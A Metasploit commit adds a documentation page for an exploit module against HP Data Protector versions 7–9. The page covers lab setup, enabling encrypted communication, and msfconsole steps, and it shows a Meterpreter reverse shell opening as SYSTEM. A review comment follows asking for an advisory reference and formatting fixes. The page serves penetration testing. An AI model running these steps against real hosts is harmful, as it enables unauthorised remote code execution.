Add hp_dataprotector_encrypted_comms.md

bug/bundler_fix
wchen-r7 2016-06-06 22:45:17 -05:00
parent 60c60bf004
commit d8d6ab3ae8
1 changed files with 75 additions and 0 deletions

@ -0,0 +1,75 @@
HP Data Protector is an automated backup and recovery software for single-server to enterprise
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
and Linux operating systems.
While the server is using Encrypted Control Communication, HP Data Protector allows a remote
attacker to gain access without authentication, and gain arbitrary code execution under the
context of SYSTEM.
## Vulnerable Application
HP Data Protector versions 7, 8, and 9 are known to be affected.
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
## Verification Steps
**Installing HP Data Protector**
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
After setting up the domain controller, double-click on the HP Data Protector installer, and you
should see this screen:
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
Click on **Install Data Protector**. And then the installer should ask you which installation type:
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
**Enabling Encrypted Communication**
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
Data Protector GUI:
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
right, click on that.
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
sure that is checked. And then click **Apply**
**Using hp_dataprotector_encrypted_comms**
After the encrypted communication is enabled, you are ready to use
hp_dataprotector_encrypted_comms. Here is what you do:
1. Start msfconsole
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
3. Do: ```set RHOST [IP ADDRESS]```
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
5. Set other options as needed
6. Do: ```exploit```, and you should receive a session like the following:
```
msf exploit(hp_dataprotector_encrypted_comms) > run
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] 172.16.23.173:5555 - Initiating connection
[*] 172.16.23.173:5555 - Establishing encrypted channel
[*] 172.16.23.173:5555 - Sending payload
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
[*] Sending stage (957999 bytes) to 172.16.23.173
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
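Review bot: The "Vulnerable Application" section states that versions 7, 8 and 9 are affected but cites no advisory or identifier for the issue; a documentation page for a module should point the reader at the same reference the module itself carries, so please add a link to the vendor advisory or tracking identifier next to the affected-versions sentence rather than leaving the claim unsourced. Two smaller points in the same hunk: step 5 ("Set other options as needed") would be more useful if it named the option a user is most likely to need, since the session output shows the target being reached on port 5555 but the steps never mention RPORT; and the inline commands in steps 2, 3, 4 and 6 are wrapped in triple backticks (e.g. `Do: ```set RHOST [IP ADDRESS]``` `), which is the fenced-block syntax rather than inline code, so single backticks would render correctly. The "Enabling Encrypted Communication" paragraph also needs a period after "click **Apply**".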